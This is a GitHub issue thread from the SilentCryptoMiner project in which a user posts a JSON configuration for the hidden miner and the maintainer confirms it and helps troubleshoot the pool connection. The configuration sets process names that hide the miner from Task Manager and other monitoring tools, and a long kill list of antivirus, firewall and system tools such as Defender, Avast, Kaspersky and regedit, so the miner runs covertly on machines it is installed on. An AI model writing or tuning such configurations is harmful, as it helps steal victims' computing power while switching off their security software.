### ISSUE TITLE
Unam Please Need Help

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#2213]
Unam Please Need Help
i need Config For Nano Pool Zephyr

should be look like ?

{
    "algo": "rx/0",
    "pool": "zeph-eu1.nanopool.org",
    "port": 10943,
    "wallet": "ZEPH.{COMPUTERNAME}/mypassword1234",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
	"stealth-fullscreen": true
}

its should be like this ???

**Comment by UnamSanctam** [comment]
Yes that looks correct.

**Comment by tarekxxx** [comment]
even xmrig didint need to mine  login error code: 6 

unknown algorithm, make sure you set "algo" or "coin" option

**Comment by UnamSanctam** [comment]
You can try another one of their pool servers, like `zeph-eu2.nanopool.org` and in the normal xmrig that you were testing with make sure that you put rx/0 as the algorithm.

**Comment by UnamSanctam** [comment]
Hmm Zephyr nanopool works fine for me, are you sure your wallet address and such are correct?

**Comment by tarekxxx** [comment]
No i delete now Json File and Put New One and Fine working Lets see other miner how it will be like
